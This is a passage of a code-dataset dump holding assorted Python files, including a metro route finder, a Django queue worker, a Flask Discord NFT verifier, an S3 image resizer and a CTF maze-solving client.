u\"มิถุนายน\", u\"กรกฎาคม\", u\"สิงหาคม\", u\"กันยายน\", u\"ตุลาคม\",\n u\"พฤศจิกายน\", u\"ธันวาคม\"][wrapMonth(m)]\n \ndef monthThaiAbbr(m):\n \"\"\"Return Thai abbreviated name of month.\"\"\"\n return [u\"ม.ค.\", u\"ก.พ.\", u\"มี.ค.\", u\"เม.ย.\", u\"พ.ค.\", u\"มิ.ย.\", \n u\"ก.ค.\", u\"ส.ค.\", u\"ก.ย.\", u\"ต.ค.\", u\"พ.ย.\", u\"ธ.ค.\"][wrapMonth(m)]\n\ndef getNumDay(year, month):\n \"\"\"Return length of day in given month\"\"\"\n if month == 2:\n if year % 400 == 0:\n return 29\n elif year % 100 == 0:\n return 28\n elif year % 4 == 0:\n return 29\n else:\n return 28\n \n return [0, 31, 0, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31][month]\n\nclass date(datetime.date):\n \"\"\"date class\"\"\"\n","repo_name":"nullzero/wp","sub_path":"lib/libdate.py","file_name":"libdate.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"3924649413","text":"transfer_stations = [\n i.split(' - ')\n for i in [\n 'Гостиный двор - Невский проспект',\n 'Спасская - Садовая - Сенная площадь',\n 'Технологический институт I - Технологический институт II',\n 'Пушкинская - Звенигородская',\n 'Владимирская - Достоевская',\n 'Маяковская - Площадь восстания',\n 'Площадь Александра Невского I - Площадь Александра Невского II',]\n]\nclass Station:\n counter = 0\n def __init__(self, name, line):\n self.name = name\n self.line = line\n self.number = Station.counter\n self.linked_stations = []\n Station.counter += 1\n def __repr__(self):\n return f'Станция \"{self.name}\"'\n\nlists = [\n (\n 'Девяткино',\n 'Гражданский проспект',\n 'Академическая',\n 'Политехническая',\n 'Площадь мужества',\n 'Лесная',\n 'Выборгская',\n 'Площадь ленина',\n 'Площадь восстания',\n 'Владимирская',\n 'Пушкинская',\n 'Технологический институт I',\n 'Балтийская',\n 'Нарвская',\n 'Кировский завод',\n 'Автово',\n 'Ленинский проспект',\n 'Проспект ветеранов'\n ),\n (\n 'Парнас',\n 'Проспект просвещения',\n 'Озерки',\n 'Удельная',\n 'Пионерская',\n 'Черная речка',\n 'Петроградская',\n 'Горьковская',\n 'Невский проспект',\n 'Сенная площадь',\n 'Технологический институт II',\n 'Фрунзенская',\n 'Московские ворота',\n 'Электросила',\n 'Парк победы',\n 'Московская',\n 'Звёздная',\n 'Купчино',\n ),\n (\n 'Беговая',\n 'Зенит',\n 'Приморская',\n 'Василеостровская',\n 'Гостиный двор',\n 'Маяковская',\n 'Площадь Александра Невского I',\n 'Елизаровская',\n 'Ломоносовская',\n 'Пролетарская',\n 'Обухово',\n 'Рыбацкое'\n ),\n (\n 'Спасская',\n 'Достоевская',\n 'Лиговский проспект',\n 'Площадь Александра Невского II',\n 'Новочеркасская',\n 'Ладожская',\n 'Проспект Большевиков',\n 'Улица Дыбенко'\n ),\n (\n 'Комендантский проспект',\n 'Старая деревня',\n 'Крестовский остров',\n 'Чкаловская',\n 'Спортивная',\n 'Адмиралтейская',\n 'Садовая',\n 'Звенигородская',\n 'Обводный канал',\n 'Волковская',\n 'Бухарестская',\n 'Международная',\n 'Проспект славы',\n 'Дунайская',\n 'Шушары'\n )\n]\n\nstations = {}\nfor line in range(len(lists)):\n line_stations = lists[line]\n for i in range(len(line_stations)):\n station = Station(line_stations[i], line)\n stations[line_stations[i].lower()] = station\n if i > 0:\n station.linked_stations.append(stations[line_stations[i - 1].lower()])\n stations[line_stations[i - 1].lower()].linked_stations.append(station)\n\nfor i in transfer_stations:\n for j in i:\n station = stations[j.lower()]\n for transfer_station in i:\n transfer_station = stations[transfer_station.lower()]\n if transfer_station.number == station.number:\n continue\n\n station.linked_stations.append(transfer_station)\n\nfirst_station = input()\nnext_station = input()\n\nclass VisitedPoint:\n def __init__(self, point: str, steps: int):\n self.point = point\n self.steps = steps\n\nclass Walker:\n def __init__(self, stations: 'dict[str, set[str]]'):\n self.visited_points = {}\n self.stations = stations\n self.path = None\n\n def solve(self, current: str, to: str, number: int = 0):\n value: VisitedPoint = self.visited_points.get(current)\n if not value or value.steps > number:\n self.visited_points[current] = VisitedPoint(current, number)\n else:\n return\n if current == to:\n return\n for station in self.stations[current]:\n self.solve(station, to, number + 1)\n\n def breadth_first_search(self, from_station, to_station):\n if isinstance(from_station, str):\n from_station = stations[from_station.lower()]\n if isinstance(to_station, str):\n to_station = stations[to_station.lower()]\n\n to_browse = [(from_station,)]\n while to_browse:\n path = to_browse[0]\n del to_browse[0]\n for i in path[-1].linked_stations:\n if i.number == to_station.number:\n self.path = path + (i,)\n return self.path\n if i in path:\n continue\n to_browse.append(path + (i,))\n\n def depth_first_search(self, from_station, to_station, path=()):\n if isinstance(from_station, str):\n from_station = stations[from_station.lower()]\n if isinstance(to_station, str):\n to_station = stations[to_station.lower()]\n\n path += (from_station, )\n\n for i in path[-1].linked_stations:\n if i.number == to_station.number:\n return path + (i,)\n\n if i in path:\n continue\n\n result = self.depth_first_search(i, to_station, path)\n if result:\n if self.path is None:\n self.path = result\n return result\n elif len(self.path) > len(result):\n self.path = result\n return result\n\nwalker = Walker(stations)\n\nprint(walker.breadth_first_search(first_station, next_station))\nwalker.depth_first_search(first_station, next_station)\nprint(walker.path)\n","repo_name":"rumintsev/Labs","sub_path":"31.10.23/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":6753,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5745518477","text":"from check_similarity import SimilarityCheck\nfrom config import BaseOptions\nfrom perform_embedding import Embed\nfrom perform_extraction import Extract\nimport warnings\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning) \n\n\nif __name__ == '__main__':\n opt = BaseOptions().parse() # get training options\n\n if opt.emb:\n print(\"Embedding\")\n encrypt = Embed(opt)\n encrypt.integrate_embedding()\n elif opt.ext:\n print(\"Extracting\")\n decrypt = Extract(opt)\n decrypt.integrate_extraction()\n elif opt.check_similarity:\n print(\"Checking Similarity\")\n similarity_check = SimilarityCheck(opt)\n similarity_check.check_similarity_all_images()\n similarity_check.copy_similar_images()","repo_name":"mannam95/dct_svd_in_dwt_watermark","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34959313911","text":"import logging\nimport signal\nimport time\nimport os\n\nfrom django.core.management.base import BaseCommand\nfrom django.db import connection\n\n\nclass Worker(BaseCommand):\n # The queue to process. Subclass and set this.\n queue = None\n logger = logging.getLogger(__name__)\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--delay',\n type=float,\n default=1,\n help=\"The number of seconds to wait to check for new tasks.\",\n )\n parser.add_argument(\n '--listen',\n action='store_true',\n help=\"Use LISTEN/NOTIFY to wait for events.\"\n )\n\n def handle_shutdown(self, sig, frame):\n if self._in_task:\n self.logger.info('Waiting for active tasks to finish...')\n self._shutdown = True\n else:\n raise InterruptedError\n\n def run_available_tasks(self):\n \"\"\"\n Runs tasks continuously until there are no more available.\n \"\"\"\n # Prevents tasks that failed from blocking others.\n failed_tasks = set()\n while True:\n self._in_task = True\n result = self.queue.run_once(exclude_ids=failed_tasks)\n job, retval, exc = result or (None, None, None)\n if exc:\n if job:\n self.logger.exception('Error in %r: %r.', job, exc, extra={\n 'data': {\n 'job': job.to_json(),\n },\n })\n failed_tasks.add(job.id)\n else:\n # This is an exception before a task could even be\n # retrieved, so it's probably fatal\n raise exc\n self._in_task = False\n if self._shutdown:\n raise InterruptedError\n if not job:\n break\n\n def handle(self, **options):\n self._shutdown = False\n self._in_task = False\n\n self.delay = options['delay']\n self.listen = options['listen']\n\n with connection.cursor() as cursor:\n cursor.execute(\"SET application_name TO %s\", ['dpq#{}'.format(os.getpid())])\n\n if self.listen:\n self.queue.listen()\n try:\n # Handle the signals for warm shutdown.\n signal.signal(signal.SIGINT, self.handle_shutdown)\n signal.signal(signal.SIGTERM, self.handle_shutdown)\n\n while True:\n self.run_available_tasks()\n self.wait()\n except InterruptedError:\n # got shutdown signal\n pass\n\n def wait(self):\n if self.listen:\n count = len(self.queue.wait(self.delay))\n self.logger.debug('Woke up with %s NOTIFYs.', count)\n return count\n else:\n time.sleep(self.delay)\n return 1\n","repo_name":"gavinwahl/django-postgres-queue","sub_path":"dpq/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"53"} +{"seq_id":"39056571313","text":"#!/usr/bin/python3\n\"\"\"script takes a URL, sends a request to the URL\nand displays the value of the X-Request-Id variable\nfound in the header of the response.\n\"\"\"\n\nif __name__ == \"__main__\":\n import sys\n import urllib.request\n\n url = sys.argv[1]\n req = urllib.request.Request(url)\n with urllib.request.urlopen(req) as res:\n headers = res.info()\n print(headers['X-Request-Id'])\n","repo_name":"stephenoba/alx-higher_level_programming","sub_path":"0x11-python-network_1/1-hbtn_header.py","file_name":"1-hbtn_header.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"7079513736","text":"'''Escribir una tupla con los meses del año, luego, pide al usuario un numero, el que haya ingresado, es el mes que debe mostrar en la tupla'''\n\nmeses = ('Enero', 'Febrero', 'Marzo', 'Abril', 'Mayo', 'Junio', 'Julio', 'Agosto', 'Septiembre', 'Octubre', 'Noviembre', 'Diciembre')\nencontrado = False\naux = int(input('Ingrese un numero: '))\n\nfor i in range(len(meses)-1):\n if aux == i:\n print(meses[i])\n encontrado = True\n break\n\nif(not(encontrado)):\n print('No se encontro el mes')\n","repo_name":"Ivoo25/Python3","sub_path":"Seccion 12 - Estructuras de Datos/Ejercicio1.py","file_name":"Ejercicio1.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40311241070","text":"from flask import Flask, render_template, request\nfrom discordmanager import Discord\nfrom web3manager import Web3Manager\nfrom config import DiscordConfig, WebConfig, Web3Config\n\napp = Flask(__name__, template_folder=\"template\", static_folder=\"static\")\ndiscord = Discord(DiscordConfig)\nweb3_manager = Web3Manager(Web3Config)\n\n\n@app.route('/')\ndef index():\n code = request.args.get('code')\n token_json = discord.get_token(code, WebConfig.REDIRECT_URI) # access 토큰\n user_json = discord.get_user_data(token_json['access_token'])\n return render_template('index.html', discordId=user_json['id'])\n\n\n@app.route('/verify', methods=['POST'])\ndef verify_post():\n # POST request에서 Discord ID, 서명값, 지갑 주소를 가져오기\n discord_id = request.form.get('discordid')\n signature = request.form.get('signature')\n wallet_address = request.form.get('wallet')\n message = request.form.get('message')\n print(f\"discord_id : {discord_id}\")\n print(f\"signature : {signature}\")\n print(f\"wallet_address : {wallet_address}\")\n print(f\"message : {message}\")\n # # Discord ID와 서명값을 확인하고, 서명 검증에 성공하면 인증 정보를 저장\n\n # 서명 검증 수행\n is_verified = web3_manager.verify_signature(message, signature, wallet_address)\n if not is_verified:\n return 'Signature verification failed', 400\n\n is_holder = web3_manager.check_holder(wallet_address)\n if not is_holder:\n return 'You are not NFT holder', 400\n\n # 검증에 성공하면 Discord 봇에서 해당 사용자에게 역할 부여\n discord.add_role(discord_id)\n return 'Verification success', 200\n\n\nif __name__ == '__main__':\n app.debug = True\n app.run(host='0.0.0.0', port=5000, threaded=True)","repo_name":"choisangh/flask-discord-nft-verifier","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37897235175","text":"import os\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nERROR_REQUIRED = 'required'\nERROR_INVALID = 'invalid'\nERROR_FORBIDDEN = 'forbidden'\nNOT_FOUND = 'not_found'\n\n# JWT\nPERSON_ACCESS = 'person_access'\nPERSON_REFRESH = 'person_refresh'\nREFRESH_COOKIE_NAME = 'flask_app__person_refresh'\n","repo_name":"Kelvedler/flask_app","sub_path":"src/app_core/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41381834209","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : utils/train_callbacks.py\n# Author : Hai-Yong Jiang \n# Date : 19.08.2018\n# Last Modified Date: 10.05.2019\n# Last Modified By : Hai-Yong Jiang \n\n\n#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# File : nn/train_callbacks.py\n# Author : Hai-Yong Jiang \n# Date : 15.05.2018\n# Last Modified Date: 11.08.2018\n# Last Modified By : Hai-Yong Jiang \nimport os\nimport torch\nimport tensorflow as tf\nfrom tensorboardX import SummaryWriter\n\nclass Callback:\n def __call__(self, *args, **kwargs):\n raise NotImplementedError\n\n def add_dict(self, writer, val_dict, prefix, epoch_id, val_type=\"scalar\"):\n for k,v in val_dict.items():\n if val_type==\"scalar\":\n writer.add_scalar(prefix+\"/\"+k, v, epoch_id)\n elif val_type==\"hist\":\n writer.add_histogram(prefix+\"/\"+k, v, epoch_id)\n\n\nclass TensorboardLoggerCallback(Callback):\n def __init__(self, cfg):\n \"\"\"\n Callback intended to be executed at each epoch\n of the training which goal is to add valuable\n information to the tensorboard logs such as the losses\n and accuracies\n Args:\n path_to_files (str): The path where to store the log files\n \"\"\"\n self.path_to_files = cfg.DATA.RES_LOG_PATH\n self.path_to_model = cfg.DATA.RES_MODEL_PATH\n self.save_best = cfg.OPTM.SAVE_BEST\n self.loss = 1e10\n\n def __call__(self, *args, **kwargs):\n if kwargs['step_name'] != \"epoch\":\n return\n\n epoch_id = kwargs['epoch_id']\n\n ## add loss for tensorboard visualization\n self.writer = SummaryWriter(self.path_to_files)\n for name in [\"train_loss\", \"val_loss\"]:\n self.add_dict(self.writer, kwargs[name],\n 'data/%s'%(name), epoch_id)\n self.add_dict(self.writer, {\"lr\": kwargs['lr']}, 'data/learning_rate', epoch_id)\n lr = kwargs['lr']\n\n if \"train_sample\" in kwargs and epoch_id>0:\n sample = kwargs[\"train_sample\"]\n for k in sample:\n if k.endswith(\"weight\"):\n if \"param_\" in k:\n self.add_dict(self.writer, {k:lr*sample[k]}, 'param/', epoch_id, \"hist\")\n if \"update_\" in k:\n self.add_dict(self.writer, {k:lr*sample[k]}, 'update/', epoch_id, \"hist\")\n\n self.writer.close()\n\n\ndef saver_keep_last_k(filename_ref, k):\n folder = os.path.dirname(filename_ref)\n filename = os.path.basename(filename_ref)\n basename, ext = os.path.splitext(filename)\n filelist = []\n for f in os.listdir(folder):\n if f.startswith(basename) and f.endswith(ext) and f!=filename:\n filelist.append(f)\n filelist = sorted(filelist)[:-k]\n for f in filelist:\n f = folder + \"/\" + f\n if os.path.exists(f):\n os.remove(f)\n else:\n print(\"Path does not exist: \" + f)\n\n\nclass ModelSaverCallback(Callback):\n def __init__(self, cfg, save_best=False, verbose=False):\n \"\"\"\n Callback intended to be executed each time a whole train pass\n get finished. This callback saves the model in the given path\n Args:\n verbose (bool): True or False to make the callback verbose\n path_to_model (str): The path where to store the model\n \"\"\"\n self.verbose = verbose\n self.path_to_model = cfg.DATA.RES_MODEL_PATH\n self.save_best = save_best\n self.suffix = \"\"\n\n def set_suffix(self, suffix):\n \"\"\"\n\n Args:\n suffix (str): The suffix to append to the model file name\n \"\"\"\n self.suffix = suffix\n\n def __call__(self, *args, **kwargs):\n if kwargs['step_name'] not in [\"train\", \"epoch\"]:\n return\n\n pth = self.path_to_model + self.suffix\n net = kwargs['net']\n torch.save(net.state_dict(), pth)\n\n if self.verbose:\n tf.logging.info(\"Model saved in {}\".format(pth))\n\n\nclass TrainSaverCallback:\n def __init__(self, cfg, max_save=5):\n self.log_interval = cfg.OPTM.IMG_LOG_INTERVAL\n self.cfg = cfg\n self.root_path = cfg.DATA.RES_IMG_PATH\n\n def __call__(self, *args, **kwargs):\n \"\"\" Save Input/Target/Predict/Diff, Corner/Line/Poly_maps \"\"\"\n if kwargs['step_name'] != \"epoch\":\n return\n epoch = 0\n if 'epoch_id' in kwargs:\n epoch = kwargs['epoch_id']\n\n if epoch%self.log_interval!= 0:\n return\n\n ## save the meshes\n for split in [\"train\", \"val\"]:\n if len(kwargs[split + \"_sample\"]) == 0:\n continue\n sample = kwargs[split + \"_sample\"]\n\n ## TODO: custom your data logger\n\n","repo_name":"HaiyongJiang/NNProjectTemplate","sub_path":"utils/train_callbacks.py","file_name":"train_callbacks.py","file_ext":"py","file_size_in_byte":4995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27719851454","text":"\n# Get the payload into payload variable\nimport json\nimport sys\nfrom os import environ\npayload_file = None\npayload = None\nfor i in range(len(sys.argv)):\n if sys.argv[i] == '-payload' and (i + 1) < len(sys.argv):\n payload_file = sys.argv[i+1]\n with open(payload_file, 'r') as f:\n payload = json.loads(f.read())\n break\n\n# Open S3 connection\nfrom boto.s3.connection import S3Connection\nAWS_ACCESS_KEY_ID = environ['AWS_ACCESS_KEY_ID']\nAWS_SECRET_ACCESS_KEY = environ.get('AWS_SECRET_ACCESS_KEY', '')\nconn = S3Connection(AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY)\nbucket = conn.get_bucket('makeymedia')\n\n# Create file names\nimport uuid\nfrom datetime import datetime\nyear = datetime.now().year\nmonth = datetime.now().month\nrandom_file_name = str(uuid.uuid4())\nfolder_location = \"/\" + str(year) + \"/\" + str(month) + \"/\"\nsmall_file_location = folder_location + random_file_name + \"_small.png\"\nlarge_file_location = folder_location + random_file_name + \"_large.png\"\nfull_file_location = folder_location + random_file_name + \"_full.png\"\n\n# Open image from the given url\nimport cStringIO\nimport urllib\nfrom PIL import Image as Im\nimg_url = payload['image_url']\n# img_url = \"http://www.adafruit.com/images/1200x900/998-00.jpg\"\nimg_string = cStringIO.StringIO(urllib.urlopen(img_url).read())\nimg = Im.open(img_string)\nprint('Image opened - %s' % img_url)\n\n# Save full image to S3\nkey = bucket.new_key(full_file_location)\nkey.set_contents_from_string(img_string.getvalue())\nprint('Full image saved - %s' % full_file_location)\n\n# Resize and Save large image to S3\nimg.thumbnail((640, 428), Im.ANTIALIAS)\nout_img_large = cStringIO.StringIO()\nimg.save(out_img_large, 'PNG')\nkey = bucket.new_key(large_file_location)\nkey.set_contents_from_string(out_img_large.getvalue())\nprint('Large image saved - %s' % large_file_location)\n\n# Resize and Save small image to S3\nimg.thumbnail((240, 240), Im.ANTIALIAS)\nout_img_small = cStringIO.StringIO()\nimg.save(out_img_small, 'PNG')\nkey = bucket.new_key(small_file_location)\nkey.set_contents_from_string(out_img_small.getvalue())\nprint('Small image saved - %s' % small_file_location)\n\n# Send updated data to makeystreet\nimport urllib2\ns3_prefix = \"http://makeymedia.s3.amazonaws.com\"\nvalues = {\n 'image_id': payload['image_id'],\n 'small_url': s3_prefix + small_file_location,\n 'large_url': s3_prefix + large_file_location,\n 'full_url': s3_prefix + full_file_location,\n}\nget_data = urllib.urlencode(values)\nurl = \"http://makeystreet-prod.elasticbeanstalk.com/image/update/?%s\" % get_data\nprint('Request Payload: %s' % get_data)\nprint('Request URL: %s' % url)\nresponse = urllib2.urlopen(url)\nprint('Response Code: %d' % response.code)\nprint('Response Text: %s' % response.read())\n","repo_name":"Makeystreet/makeystreet","sub_path":"woot/apps/catalog/iron_workers/resize_image.py","file_name":"resize_image.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40287488415","text":"import time\nimport csv\n\ndef report(ob):\n #Create log file\n log_file_report = ob.file_destination + \"/\" + \"Parameters_Results.log\"\n log_report = file(log_file_report, 'a' )\n\n #Print parameters\n #Batch or single file\n log_report.write(\"\\nRun type: %s\" % ob.runtype)\n if ob.runtype in [\"file\",\"pictures\"]:\n log_report.write(\"\\nInput file path: %s\" % ob.inDEST)\n \n else:\n log_report.write(\"\\nInput file path: %s\" % ob.batchpool)\n log_report.write(\"\\nOutput dir: %s\" % ob.fileD)\n log_report.write(\"\\nAdapt accAvg? %s\" % ob.adapt)\n \n if ob.adapt:\n log_report.write(\"\\nExpected hitrate: %s\" % ob.frameHIT)\n log_report.write(\"\\nMinimum accAvg: %s\" % ob.floorvalue)\n log_report.write(\"\\nThreshold %s\" % ob.threshT)\n log_report.write(\"\\nMinimum contour area: %s\" % ob.minSIZE)\n log_report.write(\"\\nBurnin: %s\" % ob.burnin)\n log_report.write(\"\\nScan frames: %s\" % ob.scan)\n \n if ob.frameSET:\n log_report.write(\"\\nManual framerate: %s\" % ob.frame_rate)\n log_report.write(\"\\nSet ROI: %s\" % ob.ROI_include)\n log_report.write(\"\\nArea counter?: %s\" % ob.set_areacounter)\n log_report.write(\"\\nOutput type?: %s\\n\\n\" % ob.makeVID)\n\n #Ending time\n end=time.time()\n\n #total_time()\n total_min=(end-ob.start)/60\n\n #processed frames per second\n pfps=float(ob.frame_count)/(total_min*60)\n\n ##Write to log file\n log_report.write(\"Total run time (min): %.2f \\n \" % total_min)\n log_report.write(\"Average frames per second: %.2f \\n \" % pfps)\n\n #End of program, report some statistic to screen and log\n #log\n log_report.write(\"\\n Thank you for using MotionMeerkat! \\n\")\n log_report.write(\"Candidate motion events: %.0f \\n \" % ob.total_count )\n log_report.write(\"Frames skipped due to Threshold: %.0f \\n \" % ob.nocountr)\n log_report.write(\"Frames skipped due to minSIZE: %.0f \\n \" % ob.toosmall)\n log_report.write(\"Total frames in files: %.0f \\n \" % ob.frame_count)\n rate=float(ob.total_count)/ob.frame_count*100\n log_report.write(\"Hitrate: %.2f %% \\n\" % rate)\n log_report.write(\"Exiting\")\n\n #print to screen\n print(\"\\n\\nThank you for using MotionMeerkat! \\n\")\n print(\"Total run time (min): %.2f \\n \" % total_min)\n print(\"Average frames processed per second: %.2f \\n \" % pfps) \n print(\"Candidate motion events: %.0f \\n \" % ob.total_count )\n print(\"Frames skipped due to AccAvg: %.0f \\n \" % ob.nodiff)\n print(\"Frames skipped due to Threshold: %.0f \\n \" % ob.nocountr)\n print(\"Frames skipped due to minSIZE: %.0f \\n \" % ob.toosmall)\n print(\"Total frames in files: %.0f \\n \" % ob.frame_count)\n\n rate=float(ob.total_count)/ob.frame_count*100\n print(\"Hitrate: %.2f %% \\n\" % rate)\n\n #reset frame count if in batch loop\n ob.frame_count=0\n ob.total_count=0\n ob.toosmall=0\n ob.nocountr=0\n \n #Write csv of time stamps and frame counts\n #file name\n time_stamp_report = ob.file_destination + \"/\" + \"Frames.csv\"\n\n with open(time_stamp_report, 'wb') as f:\n writer = csv.writer(f)\n writer.writerows(ob.stamp)\n if ob.set_areacounter:\n area_report = ob.file_destination + \"/\" + \"AreaCounter.csv\"\n with open(area_report, 'wb') as f:\n writer = csv.writer(f)\n writer.writerows(ob.areaC)","repo_name":"bw4sz/MotionMeerkat_Bisque","sub_path":"MotionMeerkat/report.py","file_name":"report.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17141343018","text":"from random import randint\r\n\r\nanswer = randint(1, 10)\r\nwhile True:\r\n print(answer)\r\n guess=int(input('enter a no 1-10 '))\r\n if 0< guess <11:\r\n if guess == answer:\r\n print ('corrent choice')\r\n break\r\n \r\n else:\r\n print('whong choice')\r\n","repo_name":"Shubhsingh007/python-programs","sub_path":"PYTHON Programs/problem1_2.py","file_name":"problem1_2.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35632701717","text":"from Design_patterns.parkingLot.commands.command_executor import CommandExecutor\n\n\nclass StatusCommandExecutor(CommandExecutor):\n COMMAND_NAME = \"status\"\n\n def __init__(self, parking_lot_service, output_printer):\n super().__init__(parking_lot_service, output_printer)\n\n def validate(self, command):\n return not command.params\n\n def execute(self, command):\n occupied_slots = self.parking_lot_service.get_occupied_slots()\n\n if not occupied_slots:\n self.output_printer.parking_lot_empty()\n return\n\n self.output_printer.status_header()\n for slot in occupied_slots:\n parked_car = slot.parked_car\n slot_number = str(slot.slot_number)\n\n self.output_printer.print_with_new_line(\n self.pad_string(slot_number, 12) + self.pad_string(parked_car.registration_number, 19) + parked_car.color\n )\n\n @staticmethod\n def pad_string(word, length):\n new_word = word\n while len(new_word) < length:\n new_word += \" \"\n return new_word\n","repo_name":"jameeluddin/Low-level-Design","sub_path":"Design_patterns/parkingLot/commands/StatusCommandExecutor.py","file_name":"StatusCommandExecutor.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32211344516","text":"import csv\n\n\ndef aggs_list_to_csv(aggs_list, csv_file):\n # csv header\n fieldnames = ['time', 'open', 'close', 'high', 'low', 'volume']\n\n # csv data\n rows = list(map(lambda agg_i: agg_i.to_csv_map(), aggs_list))\n\n write_to_csv_file(csv_file, fieldnames, rows)\n\n\ndef create_EPS_announcements_to_price_change_csv(result_map, csv_file):\n fieldnames = ['reported_date', 'surprise_percentage', 'surprise', 'estimated_EPS', 'reported_EPS',\n 'fiscal_date_ending', 'percentage_change']\n # csv data\n rows = []\n for key in result_map.keys():\n csv_map = result_map[key][0].to_csv_map()\n csv_map['percentage_change'] = str(result_map[key][1])\n rows.append(csv_map)\n write_to_csv_file(csv_file, fieldnames, rows)\n\n\ndef write_to_csv_file(csv_file, field_names, rows):\n with open(csv_file, 'w+', encoding='UTF8', newline='') as f:\n writer = csv.DictWriter(f, fieldnames=field_names)\n writer.writeheader()\n writer.writerows(rows)\n\n","repo_name":"Husamm/finance_data","sub_path":"generate_report.py","file_name":"generate_report.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28216697095","text":"# Code for aMAZEing - programming challenge from HackCon'18\n# https://hackcon.in\n# by Lorenzo Leonardini - Team ZenHack\n#\n#\n#\n# We intercepted some weird transmission. Can you find what they are hiding?! \n# nc 139.59.30.165 9300\n\nfrom __future__ import print_function\nfrom pwn import *\nfrom PIL import Image\nimport numpy\nimport maze as solver\nimport sys\n\nsys.setrecursionlimit(10000000)\n\nconn = remote('139.59.30.165', 9300)\nwhile True:\n line = conn.recvline(timeout=4)\n if('Enter)' in line):\n conn.recvline()\n break\n # print(line.replace('\\n', ''))\nconn.send('\\n')\n\nwhile True:\n ff = open('image.png', 'w+')\n while True:\n f = conn.recvline(timeout=4)\n # print(f)\n ff.write(bytearray(f))\n if 'Give us the path or write INVALID' in f:\n break;\n ff.close()\n\n\n im = Image.open('image.png')\n im = im.resize((im.width / 10, im.height / 10), Image.NEAREST)\n im.save('resized.png')\n im_arr = numpy.array(im)\n im.close()\n # print(im_arr)\n\n maze = []\n ll = ''\n for i in range(0, im.height + 2):\n ll += '#'\n maze.append(ll)\n for line in im_arr:\n l = '#'\n for pixel in line:\n if pixel[0] == 0:\n l += '#'\n else:\n l += ' '\n l += '#'\n maze.append(l)\n maze.append(ll)\n maze[1] = '#S' + maze[1][2:]\n maze[im.height] = maze[im.height][:-2] + 'E#'\n\n # maze_file = open('maze.txt', 'w+')\n # for i in maze:\n # for j in i:\n # maze_file.write(j)\n # maze_file.write('\\n')\n # maze_file.close()\n\n maze_obj = solver.Maze()\n maze_obj.read_personal(maze)\n solution = solver.solve(maze_obj)\n if solution:\n # print(\"\\n\\tI HAVE THE SOLUTION!\\n\")\n # maze_obj.write_file('solution.txt')\n conn.send(maze_obj.return_solution() + '\\n')\n else:\n # print(\"\\n\\tI DON'T HAVE THE SOLUTION!\\n\")\n conn.send('INVALID\\n')\n\n while conn.can_recv(timeout=4):\n readed = conn.recvline(timeout=4)\n # print(readed)\n if 'WooHoo you got it correct. Now solve a few more and get your flag.' in readed:\n break\n\n finished = False\n\n while True:\n readed = conn.recvline(timeout=4)\n if 'PNG' in readed:\n conn.unrecv(readed)\n break\n elif 'Congratulations' in readed:\n print(readed, end='')\n finished = True\n break\n\n if finished:\n break\n","repo_name":"LorenzoLeonardini/CTF-Solves","sub_path":"HackCon2018/aMAZEing/aMAZEing.py","file_name":"aMAZEing.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21521628727","text":"#!/usr/bin/env python\nimport numpy as np\nimport crust1 \nimport cartopy.feature as cfeature\nimport cartopy as cart\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as ml\nfrom scipy.interpolate import griddata\nfrom obspy.clients.fdsn import Client\nfrom obspy.core import UTCDateTime\nmodel = crust1.crustModel()\n\nimport matplotlib as mpl\nmpl.rc('font', family='serif')\nmpl.rc('font', serif='Times')\n#mpl.rc('text', usetex=True)\nmpl.rc('font', size=14)\n\n\n\ndef get_upo(lat, lon, depths):\n model_result = model.get_point(lat, lon)\n cvp, cvs, crho = [],[],[]\n for depth in depths:\n mdepth = 0.\n for layer in model_result:\n if layer == 'water':\n continue\n mdepth += model_result[layer][3]*1000.\n if mdepth >= depth:\n cvp.append(model_result[layer][0]*1000)\n cvs.append(model_result[layer][1]*1000)\n crho.append(model_result[layer][2]*1000)\n break\n cvp = np.array(cvp)\n cvs = np.array(cvs)\n crho = np.array(crho)\n return cvp, 